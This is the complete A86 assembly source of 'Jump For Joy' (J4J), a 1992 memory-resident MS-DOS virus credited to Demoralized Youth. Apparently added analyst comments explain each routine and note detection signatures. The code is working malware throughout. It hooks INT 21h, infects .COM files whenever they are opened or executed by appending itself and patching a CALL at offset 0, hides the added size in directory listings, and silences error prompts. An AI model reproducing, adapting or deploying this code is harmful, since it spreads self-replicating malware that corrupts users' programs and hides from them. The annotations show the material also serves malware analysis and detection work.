;J4J - Jump For Joy, released 31 Jan 92, (c) Charlie of Demoralized Youth
|
||
;------------------------------------------------------------------------
|
||
;This source has been lying around for a veeeeeery long time, and I will
|
||
;*NOT* continue to make newer versions of J4J, so that is the reason
|
||
;why I release the source.
|
||
;
|
||
;It's been 'bout a month since my last glance on it, so it's maybe full
|
||
;of bugs, but anyways; assemble with A86
|
||
;
|
||
;Some ideas were taken from Omicron / FLIP B (Just the startup), but
|
||
;the rest was done by CHARLIE of DEMORALIZED YOUTH!
|
||
;
|
||
;Fuck this code up however you like...
|
||
|
||
;Residency footprint.  Only tsr_para is used below; tsr_bytes is not
;referenced anywhere in this file.
tsr_bytes equ 1024
;Paragraphs (16-byte units) carved off the host's memory block for the
;resident copy: 4096 bytes.
tsr_para equ (4096 / 16)
|
||
|
||
;------------------------------------------------------------------------
; Startup code.  This is the first thing executed in an infected host:
; the CALL that mekke_fil writes over the host's first three bytes lands
; here.  The code locates itself at run time (call/pop below) and is
; otherwise position-independent.
;
; Step 1: "are you there?" probe.  AX = 1991 + 13881 = 3E00h, i.e. DOS
; function 3Eh (close handle) with BX = 1991.  A resident copy answers by
; returning AX = 1991 (see the AH=3Eh branch of new_int_21); plain DOS
; returns an error for the bogus handle.  Detection note: an INT 21h
; AH=3Eh call with BX=1991 is a usable behavioural signature.
;------------------------------------------------------------------------
cpt1 equ $

mov ax,1991
mov bx,ax
mov cx,ax                          ;cx keeps the expected reply (1991)
add ax,13881                       ;ax = 3E00h -> INT 21h/3Eh, bx = 1991
int 21h
cmp ax,cx
je fail                            ;already resident: just run the host

;Step 2: refuse to install unless SP is within 16 bytes of the segment
;top, i.e. the host was loaded as a normal .COM with a full 64K segment.
cmp sp,-10h
jb fail

;Step 3: locate the host's Memory Control Block (the paragraph just
;below the PSP) and insist it is the last block in the chain ('Z').
mov ax,cs
dec ax
mov es,ax
cmp byte es:[0000h],'Z'
jne fail

;Step 4: shrink the MCB by tsr_para paragraphs (MCB+3 = block size in
;paragraphs).  Bail out if the block is too small.
mov ax,es:[0003h]
sub ax,tsr_para
jc fail

mov es:[0003h],ax
;es:[0012h] is 2 bytes past the 16-byte MCB, i.e. PSP:0002h, the
;top-of-memory segment (layout inference - confirm against the DOS
;MCB/PSP layout).  Lowering it by the same amount and loading ES with
;the result gives the segment just stolen from the host; the resident
;copy lives there.  No MCB is created for that block.
sub word ptr es:[0012h],tsr_para
mov es,es:[0012h]

;Step 5: get our own load address (call-to-next-instruction / pop).
call $+3

cpt3 equ $

pop si                             ;si = runtime offset of cpt3
mov bx,si
sub si,(cpt3-cpt1)                 ;si = runtime offset of cpt1
add si,(cpt4-cpt1)                 ;si = runtime offset of cpt4 (= fail)
push cs
push si                            ;far return address for init's RETF:
                                   ;cs:fail in the host image

;Step 6: copy the whole body (cpt1 .. total) to es:0100h.
mov si,bx
sub si,(cpt3-cpt1)                 ;si = runtime offset of cpt1 again
mov cx,offset total-100h           ;body length in bytes
mov di,100h
push es
rep movsb
;Hard-coded target offset inside the relocated copy; presumably the
;'jmp init' at cpt2 (cpt2 - cpt1 + 100h) - TODO confirm by assembling.
;Any change to the byte length of the startup code above silently
;breaks this.
mov di,17Dh+2
push di

retf                               ;far jump to es:017Fh in the new copy
cpt4 equ $
|
||
|
||
;------------------------------------------------------------------------
; fail: hand control to the host program.  Reached directly when the
; body is already resident or cannot install, and via init's RETF after
; a successful installation (cpt4 == fail, see the startup code).
; Restores the host's original first three bytes at 0100h..0102h, zeroes
; the general registers, sets DS = ES = CS and "returns" to 0100h.
;------------------------------------------------------------------------
fail:
mov ax,100h
push ax                            ;the ret below pops this -> 0100h
xor ax,ax
xor bx,bx
xor cx,cx
xor dx,dx
xor si,si
xor di,di
xor bp,bp
push cs
push cs
pop es
pop ds
;The two immediates below are patched in the resident copy by mekke_fil
;(through rpl1/rpl2) with the victim's original three bytes before the
;body is appended to it.  The defaults, CD 20 90 (int 20h / nop), make
;an unpatched body terminate instead of executing whatever is at 0100h.
mov word [100h],20CDh
rpl1 equ $-2                       ;address of the 16-bit immediate
mov byte [102h],90h
rpl2 equ $-1                       ;address of the 8-bit immediate
ret

cpt2 equ $                         ;offset of the jmp that the startup
                                   ;code RETFs to in the relocated copy

jmp init
|
||
|
||
|
||
;Continuation addresses.  Each hook pushes one of these before jumping to
;file_main, whose final RET "returns" to it.
fcb_open dw offset fcb_open_cont   ;after FCB open: restore ds/dx first
exec dw offset back                ;after EXEC (4B00h): chain to old 21h
open_handle dw offset back         ;after open-handle (3Dh): chain to old 21h
|
||
|
||
;------------------------------------------------------------------------
; new_int_21: resident INT 21h hook.  Installed by init; the original
; vector is kept in old_int_21 and reached through the far jump at 'back'.
; Intercepted functions:
;   0Fh         open via FCB         -> infect (name converted to ASCIIZ)
;   11h/12h     FCB find first/next  -> hide the body size (fcb_dir)
;   3Eh,BX=1991 residency probe      -> answer AX=1991, no chaining
;   3Dh         open via handle      -> infect
;   4B00h       load and execute     -> infect
; Everything else falls through to the previous handler with the flags
; as they were on entry (pushf here / popf at 'back').
;------------------------------------------------------------------------
new_int_21:
pushf

cmp ah,0Fh ;open file using FCB's
jne not_open_fcb

call fcb_to_asciiz                 ;cs:file <- "D:NAME.EXT",0 from ds:dx
push dx
push ds

push cs
pop ds
mov dx,offset file                 ;file_main expects ds:dx -> ASCIIZ name

push cs:[fcb_open]                 ;return address for file_main's RET
jmp file_main

fcb_open_cont:
pop ds
pop dx
jmp back

not_open_fcb:
;Handle-based directory stealth (4Eh/4Fh -> handle_dir) is disabled:
;with these four lines commented out handle_dir is unreachable, so only
;FCB directory listings (11h/12h) are lied to.  Handle-based FindFirst/
;FindNext report true sizes - useful when looking for the appended body.
;cmp ah,4Eh
;je handle_dir
;cmp ah,4Fh
;je handle_dir

cmp ah,11h
je fcb_dir
cmp ah,12h
je fcb_dir

;Residency probe: close-handle with the magic handle 1991.  Reply AX=1991
;(xchg) and return straight to the caller without chaining.
cmp ah,3Eh
jne clodd
cmp bx,1991
jne clodd
xchg ax,bx
popf
iret

clodd:
cmp ah,3Dh
jne last_chance
push cs:[open_handle]
jmp file_main

last_chance:
cmp ax,4B00h
jne back

push cs:[exec]
jmp file_main

back:
popf
db 0EAh                            ;JMP FAR opcode; its operand is ...
old_int_21 dw 0,0                  ;... the saved vector, filled by init
|
||
|
||
;------------------------------------------------------------------------
; handle_dir: stealth for handle-based find first/next (4Eh/4Fh).
; Dead code in this build - the dispatch to it in new_int_21 is
; commented out.  Runs the original call and then, because of the jnc,
; reaches stealth_dir_handle only when the original call returned with
; carry set and AX = 0.
;------------------------------------------------------------------------
handle_dir:
popf
call int21                         ;original find first/next

pushf
jnc back_handle_dir

cmp ax,0
jne back_handle_dir

call stealth_dir_handle
sti

back_handle_dir:
popf
iret
|
||
|
||
;------------------------------------------------------------------------
; fcb_dir: stealth for FCB find first/next (11h/12h).  Calls the original
; handler; if it reported success (AL = 0) the directory entry DOS just
; placed in the caller's DTA is handed to stealth_dir_fcb, which
; subtracts the body size from entries carrying the infection marker.
;------------------------------------------------------------------------
fcb_dir:
popf
call int21

pushf
cmp al,00h                         ;AL = 0: an entry was returned
jne back_fcb_dir

call stealth_dir_fcb
sti

back_fcb_dir:
popf
iret
|
||
|
||
;Scratch layout in the resident segment.  file_info_get sets the DTA to
;cs:0080h before FindFirst, so 80h.. holds the DOS find block and the
;f_* names below are offsets into it.
;fcb_fname/fcb_fext: presumably the search template DOS keeps in the
;undocumented first bytes of the find block (8+3, space padded) - the
;"COmmand.com" comparisons in file_info_get rely on it.  Confirm against
;the DOS version targeted.
fcb_fname equ 80h+1                ;first two characters of the name
fcb_fext equ 80h+1+8               ;first two characters of the extension

;Documented find-block fields.
f_attr equ 80h+15h
f_time equ 80h+16h
f_date equ 80h+18h
f_size equ 80h+1Ah                 ;dword
f_asciiz equ 80h+1Eh

;The first 21 bytes of the find block are DOS's FindNext state; this
;code never calls FindNext and reuses them as scratch once the name
;checks are done.
f_handle equ 80h                   ;open handle of the victim
f_head_buffer equ 80h+2            ;victim's first 3 bytes
f_tail_buffer equ 80h-3            ;victim's last 3 bytes (7Dh..7Fh,
                                   ;just below the DTA)
f_type equ 80h+6                   ;0 = COM, 1 = EXE
|
||
|
||
|
||
;Infection patch buffers.
;repl0: the 3-byte CALL written over the victim's first three bytes.
;mekke_fil fills the rel16 operand with size-3 so it lands on the body
;appended at the old end of file.
repl0: db 0E8h,?,? ;call ????

;Older layout, compiled out: a separate stub restored the original bytes
;instead of patching rpl1/rpl2 in 'fail' directly.
;repl1: db 0C7h,6,0,1,?,? ;mov word [0100h],????
; db 0C6h,6,2,1,? ;mov byte [0102h],??

;repl2..repl3: leftover of that stub.  Nothing in this file jumps to it
;or copies it out; it would pull the return address pushed by the CALL
;back by 3 bytes.
repl2: push bp
mov bp,sp
sub word [bp+2],3
pop bp

repl3:


;Text embedded in the body (non-ASCII bytes garbled in this rendering);
;stable enough to serve as part of a static signature.
db 'Elo<6C>, Elo<6C>, lam<61> sabakt<6B>ni?'
|
||
|
||
;------------------------------------------------------------------------
; file_main: common infection path for the open / FCB-open / exec hooks.
; In:  ds:dx -> ASCIIZ path of the file the program is about to use;
;      a continuation offset pushed by the caller (the final RET goes
;      there).
; Saves every register, copies the name into cs:file, points DS at the
; resident segment, swaps in the silent INT 24h handler, then runs
; file_info_get (filter + open + read head/tail), mekke_fil (write) and
; file_info_set (restore attributes/date/time, close).  Registers and
; flags are restored, so the interrupted DOS call proceeds unchanged.
;------------------------------------------------------------------------
file_main:
pushf
;The COM/EXE extension filter is compiled out: other_file_type_check is
;never consulted and every name reaching here is examined.
;call other_file_type_check
;jnc file_main_pr1
jmp file_main_pr1

popf                               ;unreachable while the jmp above stands
jmp back

file_main_pr1:
push ax
push bx
push cx
push dx
push si
push di
push bp
push es
push ds

push cs
pop es

mov si,dx
mov di,offset file                 ;always copies 65 bytes, whatever the
cld                                ;length of the name at ds:dx
mov cx,65
rep movsb

push cs
pop ds

call setup_24                      ;suppress "Abort, Retry, Fail?"

;8086 guard compiled out.
;call cpu_check
;cmp ax,1
;je file_slutt

call file_info_get
jc file_is_done                    ;not a candidate, or open/read failed

call mekke_fil

file_is_done:
;Runs even when file_info_get bailed out before opening, in which case
;f_handle / f_attr still hold whatever the previous file left there.
call file_info_set

file_slutt:

call rest_24

pop ds
pop es
pop bp
pop di
pop si
pop dx
pop cx
pop bx
pop ax
popf
ret ;jmp back
|
||
|
||
file db 65 dup(0)                  ;ASCIIZ name of the current victim

old_dta dw ?,?                     ;caller's DTA (offset,segment): saved by
                                   ;file_info_get, restored by file_info_set
|
||
|
||
;------------------------------------------------------------------------
; file_info_get: decide whether cs:file is a victim and open it.
; Out: CY - skip this file (filter failed, or open/read failed).
;      NC - f_handle open read/write, f_head_buffer / f_tail_buffer hold
;           the first and last three bytes, f_type = 0 (COM) / 1 (EXE),
;           DTA = cs:0080h.
; Side effects: saves the caller's DTA; clears the file's attributes
; (so the open for write is not refused - presumed intent).
; Passed over: System attribute set; name starting "CO" or "IB";
; extension starting "SY"; size >= 64K or > 60000; 'MZ'/'ZM' header
; is marked EXE (mekke_fil later refuses it); 0FFFFh header (device
; driver).
;------------------------------------------------------------------------
file_info_get:
mov ah,2Fh ;get DTA address
call int21
mov old_dta[2],es
mov old_dta[0],bx
mov ah,1Ah ;set DTA address
push cs
pop ds
mov dx,80h                         ;DTA = cs:0080h (the f_* area)
call int21

mov ah,4Eh ;FIND FIRST (get info about
mov cx,1+2+32 ;our file)               ;match RO | HIDDEN | ARCHIVE too
mov dx,offset file
call int21
jnc file_info_get_ok
stc
ret

;Target of the 'file_info_get_ok-2' jumps below: reject with CY.
stc
ret
file_info_get_ok:
clc

test word [f_attr],4 ;is the System attr. set?
jnz offset file_info_get_ok-2 ;yeah, so don't do it..

;Two-character constants are stored byte-swapped, so 'OC' matches "CO"
;in memory, 'BI' matches "IB" and 'YS' matches "SY".
cmp word [fcb_fname],'OC' ;like in: COmmand.com
je offset file_info_get_ok-2 ;the command-interpreter

cmp word [fcb_fname],'BI' ;like in: IBmbio.com and IBmdos.com
je offset file_info_get_ok-2 ;the startup files for IBM-dos

cmp word [fcb_fext],'YS' ;like in: country.SYs
je offset file_info_get_ok-2 ;device drivers and .SYS files

mov ax,4301h ;set attribute
xor cx,cx ;attr=0
mov dx,offset file
call int21

mov ax,3D02h ;open file                 ;read/write access
mov dx,offset file
call int21
jnc fig_open
fig_fail:
stc
ret
fig_open:
mov [f_handle],ax

mov bx,ax
mov ah,3Fh ;read from file
mov cx,3 ;3 bytes
mov dx,f_head_buffer
call int21
jnc fig_read
jmp fig_fail

fig_read:
cmp ax,3                           ;short read -> not a candidate
jne fig_fail

mov ax,4200h                       ;seek from start to size-3 ...
xor cx,cx
mov dx,[f_size]
sub dx,3
mov bx,[f_handle]
call int21

mov ah,3Fh                         ;... and read the last 3 bytes
mov cx,3                           ;(infection marker lives there)
mov dx,f_tail_buffer
call int21

cmp word [f_size+2],0              ;size must fit in 16 bits ...

jnz fig_fail
cmp [f_size],60000                 ;... and leave room for the body
ja fig_fail

;The two EXE comments are swapped relative to the byte order the
;assembler produces; both spellings are rejected either way.
cmp word [f_head_buffer],'MZ' ;EXE 'ZM' ?
je file_is_exe
cmp word [f_head_buffer],'ZM' ;EXE 'MZ' ?
je file_is_exe
cmp word [f_head_buffer],-1 ;Device Driver ?
je fig_fail

mov byte [f_type],0 ;filetype = COM
clc
ret
file_is_exe:
mov byte [f_type],1 ;filetype = EXE
clc
ret
|
||
|
||
;------------------------------------------------------------------------
; file_info_set: undo the traces left by file_info_get / mekke_fil.
; Restores the caller's DTA, the original attributes and the original
; date/time - except that the 5-bit seconds/2 field is forced to 30
; (reads as "60 seconds"), which is the marker the directory-stealth
; code tests for.  Then closes f_handle.
; Detection note: a .COM whose timestamp shows 60 seconds is a cheap
; on-disk indicator for this family.
;------------------------------------------------------------------------
file_info_set:
mov ah,1Ah ;set DTA address
mov dx,old_dta[0]
mov bx,old_dta[2]
mov ds,bx
call int21

push cs
pop ds

mov ax,4301h ;restore ATTRibutes
mov cx,[f_attr]
mov dx,offset file
call int21

mov ax,5701h ;restore DATE & TIME
mov bx,[f_handle]
mov cx,[f_time]
and cl,255-31                      ;clear the seconds/2 field ...
or cl,30                           ;... and set it to 30 (marker)
mov dx,[f_date]
call int21

mov ah,3Eh ;close file
mov bx,[f_handle]
call int21
ret

;Garbled (non-ASCII) bytes embedded in the body; another static
;signature candidate.
db '<27><><EFBFBD>--?!?'
|
||
|
||
;------------------------------------------------------------------------
; mekke_fil: append the body to the open victim.
; Pre: file_info_get returned NC (f_handle, f_size, f_head_buffer,
;      f_tail_buffer and f_type valid).
; Refuses (CY) files of 1023 bytes or less, anything but f_type = 0
; (EXE support was never finished) and files already ending in the
; "J4" marker.
; Otherwise: stores size-3 into repl0's CALL operand, copies the
; victim's original three bytes into the immediates at rpl1/rpl2 (so the
; appended body can restore them), writes the 3-byte CALL at offset 0,
; seeks to EOF and appends 0100h..total of the resident segment.
; Only the final write is checked: on failure the original head bytes
; are written back and CY is returned.  NC on success.
;------------------------------------------------------------------------
mekke_fil:
cmp [f_size],1023
ja not_one_n0
stc
ret

not_one_n0:
cmp byte ptr [f_type],0
je not_one_n1
stc
ret

not_one_n1:
cmp word ptr [f_tail_buffer],'4J'  ;"J4" in memory: already infected
jne not_one
stc
ret

not_one:
mov ax,[f_size] ;calculate CALL
sub ax,3 ;length                   ;rel16 from 0103h to the old EOF
mov repl0[1],ax

mov ax,word [f_head_buffer]        ;victim's original bytes 0..2 ...
mov bl,byte [f_head_buffer]+2

mov [offset rpl1],ax               ;... become the immediates of the
mov [offset rpl2],bl               ;restore code in 'fail' (self-patch)
; mov word ptr repl1[4],ax ;restore orig bytes
; mov repl1[10],bl ;after CALL...

mov ax,4200h ;seek to file_start
mov bx,[f_handle]
xor cx,cx
mov dx,cx
call int21

mov ah,40h ;write CALL XXXX
mov bx,[f_handle]
mov cx,3 ;3 bytes
mov dx,offset repl0
call int21

mov ax,4202h ;seek to EOF
mov bx,[f_handle]
xor cx,cx
mov dx,cx
call int21

;Old two-part layout (separate startup stub) - compiled out.
; mov ah,40h ;write startup-code
; mov bx,[f_handle]
; mov cx,(offset repl3)-offset repl1
; ;???? bytes
; mov dx,offset repl1
; call int21
; jc replace_them_now

mov ah,40h ;write main code
mov bx,[f_handle]
mov cx,offset total-100h           ;whole body, including patched 'fail'
mov dx,100h
call int21
jc $+2+1+1                         ;skip clc/ret -> replace_them_now
clc
ret

replace_them_now:
mov ax,4200h ;seek to beginning
mov bx,[f_handle] ;of the file
xor cx,cx
mov dx,cx
call int21

mov ah,40h ;error, so write
mov bx,[f_handle] ;back 3 first bytes
mov cx,3
mov dx,f_head_buffer
call int21
stc
ret


;Credit string; another static-signature candidate.
db 'Charlie says: Support ()DEMORALIZED YOUTH() '
|
||
|
||
;;*************************************************************
|
||
;;* CPU checker, coded by Data Disruptor / RABiD Nat'nl Corp. *
|
||
;;*************************************************************
|
||
;cpu_check:
|
||
; xor ax,ax
|
||
; push ax
|
||
; popf
|
||
; pushf
|
||
; pop ax
|
||
; and ax,0f000h
|
||
; cmp ax,0f000h
|
||
; je mc_8086
|
||
; mov ax,0f000h
|
||
; push ax
|
||
; popf
|
||
; pushf
|
||
; pop ax
|
||
; and ax,0f000h
|
||
; jz mc_80286
|
||
; mov ax,3
|
||
; ret
|
||
;mc_80286:
|
||
; mov ax,2
|
||
; ret
|
||
;mc_8086:
|
||
; mov ax,1
|
||
; ret
|
||
|
||
|
||
;***************************************
|
||
;
|
||
; Call previously saved Int 21h Handler
|
||
;
|
||
;***************************************
|
||
;int21: invoke the original INT 21h handler as an interrupt would
;(flags pushed, far call through the saved vector).
int21:
pushf
call dword ptr cs:old_int_21
ret
|
||
|
||
;**********************************************
|
||
;
|
||
; Int 24h (Critical Error Handler) Code & Data
|
||
;
|
||
;**********************************************
|
||
err dw 0                           ;critical-error counter: incremented
                                   ;by new_24, never read in this file

old_24 dw ?,?                      ;saved INT 24h vector (offset,segment)
;Replacement critical-error handler: count the event, return AL = 0
;("ignore") to DOS.  Net effect: no "Abort, Retry, Fail?" prompt while a
;victim is being written, e.g. on a write-protected disk.
new_24: inc cs:err
mov al,0
stc
iret
|
||
|
||
;****************************************************************
|
||
;
|
||
; Fix so that Int 24h (Critical Error Handler) won't display the
|
||
; "abort, retry, fail?" message
|
||
;
|
||
;****************************************************************
|
||
;------------------------------------------------------------------------
; setup_24: install new_24 as the INT 24h handler, saving the old vector
; in old_24.  Reads and writes the interrupt vector table directly at
; 0000:0090h instead of going through DOS 35h/25h - a direct IVT write
; is worth flagging in behavioural monitoring.  Leaves DS = ES = CS.
; Clobbers ax, bx.
;------------------------------------------------------------------------
setup_24:
xor ax,ax
mov ds,ax                          ;ds = IVT segment

les bx,[24h*4]                     ;es:bx = current INT 24h vector

push cs
pop ds

mov word ptr old_24[0],bx
mov word ptr old_24[2],es

mov ds,ax                          ;ax is still 0 -> IVT again
mov word ptr [24h*4],offset new_24
mov word ptr [24h*4+2],cs

push cs
push cs
pop es
pop ds
ret
|
||
|
||
;**********************************************************
|
||
;
|
||
; Restore original Int 24h (Critical Error Handler) vector
|
||
;
|
||
;**********************************************************
|
||
;------------------------------------------------------------------------
; rest_24: write the vector saved in old_24 back into the IVT at
; 0000:0090h (direct write, no DOS call).  Leaves DS = CS.  Clobbers
; ax, bx, es.
;------------------------------------------------------------------------
rest_24:
les bx,cs:old_24                   ;es:bx = saved INT 24h vector

xor ax,ax
mov ds,ax                          ;ds = IVT segment

mov word ptr [24h*4],bx
mov word ptr [24h*4+2],es

push cs
pop ds
ret
|
||
|
||
|
||
;*********************************************************
|
||
;
|
||
; Check if the filename has got an extension of .COM or
|
||
; .EXE. Returns with CY if not a valid filetype, or NC if
|
||
; it is a valid one.
|
||
;
|
||
;*********************************************************
|
||
;------------------------------------------------------------------------
; other_fail: shared failure exit of other_file_type_check - pops
; everything that routine pushed and returns with CY.  Only reached by
; jumps from other_file_type_check.
;------------------------------------------------------------------------
other_fail:
pop bp
pop ds
pop es
pop di
pop si
pop dx
pop cx
pop bx
pop ax
popf
stc ;return with CY
ret

;------------------------------------------------------------------------
; other_file_type_check: does the ASCIIZ name at ds:dx end in .COM/.EXE?
; Unused in this build (its call in file_main is commented out).
; Scans at most 127 bytes for the NUL, steps back five bytes to where
; ".XXX",0 is expected, and compares the extension with lower case
; folded to upper (the 0DFDFh / 0DFh masks).  Accepts "CO" or "EX"
; followed by 'M' or 'E', i.e. COM, COE, EXM, EXE.
; NC = accepted, CY = rejected.  All registers and flags preserved.
;------------------------------------------------------------------------
other_file_type_check: ;here the main routine starts
pushf
push ax
push bx
push cx
push dx
push si
push di
push es
push ds
push bp

mov di,dx
push ds
pop es

cld
mov cx,127
xor al,al
repnz scasb                        ;find the terminating NUL
jne other_fail                     ;none within 127 bytes
dec di
dec di
dec di
dec di
dec di                             ;di -> expected '.' of the extension

xchg si,di
lodsb
cmp al,'.'
jne other_fail

lodsw                              ;first two extension characters
and ax,0DFDFh                      ;fold to upper case
cmp ax,'OC'                        ;"CO" in memory
je other_okfil
cmp ax,'XE'                        ;"EX" in memory
je other_okfil
jmp other_fail

other_okfil:
lodsb                              ;third extension character
and al,0DFh
cmp al,'M'
je other_okfil2
cmp al,'E'
jne other_fail

other_okfil2:
pop bp
pop ds
pop es
pop di
pop si
pop dx
pop cx
pop bx
pop ax
popf
clc ;return with NC
ret
|
||
|
||
|
||
;------------------------------------------------------------------------
; stealth_dir_handle: after a handle find first/next, if the entry in
; the DTA carries the infection marker (time seconds/2 field = 30) and
; its size fits in 16 bits, subtract the body length from the reported
; size.  Unreachable in this build (see handle_dir).
; The 'jc' on entry jumps to the pop sequence before anything has been
; pushed; if taken it leaves the stack unbalanced.
;------------------------------------------------------------------------
stealth_dir_handle:
jc done_stealthing_handle

pushf
push ax
push bx
push cx
push dx
push si
push di
push ds
push es
push bp

mov ah,2Fh                         ;es:bx = current DTA (find block)
call int21

mov ax,word ptr es:[bx+16h]        ;file time
mov ah,1Eh
and al,1Fh                         ;seconds/2 field
cmp al,ah                          ;== 30 -> infected
jne done_stealthing_handle

cmp word es:[bx+1Ah+2],0           ;size high word must be 0
jne done_stealthing_handle
mov ax,word es:[bx+1Ah]
sub ax,(offset total)-100h         ;hide the appended body
jc done_stealthing_handle
mov word es:[bx+1Ah],ax

done_stealthing_handle:
pop bp
pop es
pop ds
pop di
pop si
pop dx
pop cx
pop bx
pop ax
popf
ret
|
||
|
||
;------------------------------------------------------------------------
; stealth_dir_fcb: after an FCB find first/next, if the directory entry
; DOS copied into the DTA carries the infection marker (time seconds/2
; field = 30) and its size fits in 16 bits, subtract the body length
; from the reported size.  The offsets used (1Eh time, 24h size) place
; the 32-byte directory entry 8 bytes into the DTA, which matches an
; extended-FCB search result - inference from the offsets, confirm
; against the DOS FCB layout.  All registers and flags preserved.
;------------------------------------------------------------------------
stealth_dir_fcb:
pushf
push ax
push bx
push cx
push dx
push si
push di
push ds
push es
push bp

mov ah,2Fh                         ;es:bx = current DTA
call int21

; mov es,ds
; mov bx,dx

mov ax,word ptr es:[bx+14+10h] ;16h]   ;file time of the entry
mov ah,30 ;1Eh
and al,31 ;1Fh                         ;seconds/2 field
cmp al,ah                          ;== 30 -> infected
jne done_stealthing_fcb

cmp word es:[bx+22+10h],0 ;+10h+2],0   ;size high word must be 0
jne done_stealthing_fcb

mov ax,word es:[bx+20+10h] ;+10h]      ;size low word
sub ax,(offset total)-100h         ;hide the appended body
jc done_stealthing_fcb
mov word es:[bx+20+10h],ax

done_stealthing_fcb:
pop bp
pop es
pop ds
pop di
pop si
pop dx
pop cx
pop bx
pop ax
popf
ret
|
||
|
||
|
||
|
||
|
||
;------------------------------------------------------------------------
; init: runs once in the relocated copy (reached through the RETF in the
; startup code).  Saves the INT 21h vector into old_int_21 - the operand
; of the far jump at 'back' - and points INT 21h at new_int_21, via DOS
; 35h/25h with interrupts disabled.  The final RETF goes to cs:fail in
; the host image, pushed earlier by the startup code.
; Detection note: the hooked vector points into memory no MCB accounts
; for (the startup code shrinks the host's block but creates none for
; the stolen paragraphs) - a classic resident-infector indicator.
;------------------------------------------------------------------------
init:
cli
push cs
push cs
pop ds
pop es

mov ax,3521h                       ;get vector 21h -> es:bx
int 21h
mov word ptr old_int_21[0],bx
mov word ptr old_int_21[2],es
mov dx,offset new_int_21
mov ax,2521h                       ;set vector 21h = ds:dx
int 21h
sti

retf
|
||
;------------------------------------------------------------------------
; fcb_to_asciiz: build cs:file = "D:NAME.EXT",0 from the FCB at ds:dx.
; FCB bytes used: 0 = drive byte, 1..8 = name, 9..11 = extension, both
; space padded.  A drive byte of 0 emits no "D:" prefix; otherwise the
; letter written is drive byte + 'A'.  Name and extension are copied up
; to the first space or their full width.  Preserves all registers and
; flags; dx is untouched.
;------------------------------------------------------------------------
fcb_to_asciiz:
pushf
push ax
push cx
push si
push di
push es

push cs
pop es
mov di,offset file                 ;es:di = output buffer

cld
mov si,dx ;fcb_start
lodsb                              ;drive byte
cmp al,0
je fcb_in_current_dir

add al,'A'                         ;drive letter = drive byte + 'A'
stosb
mov al,':'
stosb
jmp anyway

fcb_in_current_dir:
inc si                             ;no effect: si is reloaded below

anyway:
mov si,dx
inc si                             ;si -> 8-character name
mov cx,8
fcb_file_name_xfer:
lodsb
cmp al,' '                         ;first blank ends the name
je fcb_done_1
stosb
loop fcb_file_name_xfer

fcb_done_1:
mov al,'.'
stosb

mov si,dx ;fcb_start
add si,1+8                         ;si -> 3-character extension
mov cx,3
fcb_file_ext_xfer:
lodsb
cmp al,' '                         ;first blank ends the extension
je fcb_done_2
stosb
loop fcb_file_ext_xfer

fcb_done_2:
mov al,0                           ;NUL terminator
stosb

pop es
pop di
pop si
pop cx
pop ax
popf
ret
|
||
|
||
|
||
size dw (offset total)-100h        ;body length; not read by this code

;Infection marker: the last three bytes of every infected file
;(mekke_fil tests for "J4" at f_tail_buffer).  Together with the CALL
;at offset 0 this is the simplest static check for the family.
db 'J4J'

total:                             ;end of body; total-100h bytes are
                                   ;appended per infection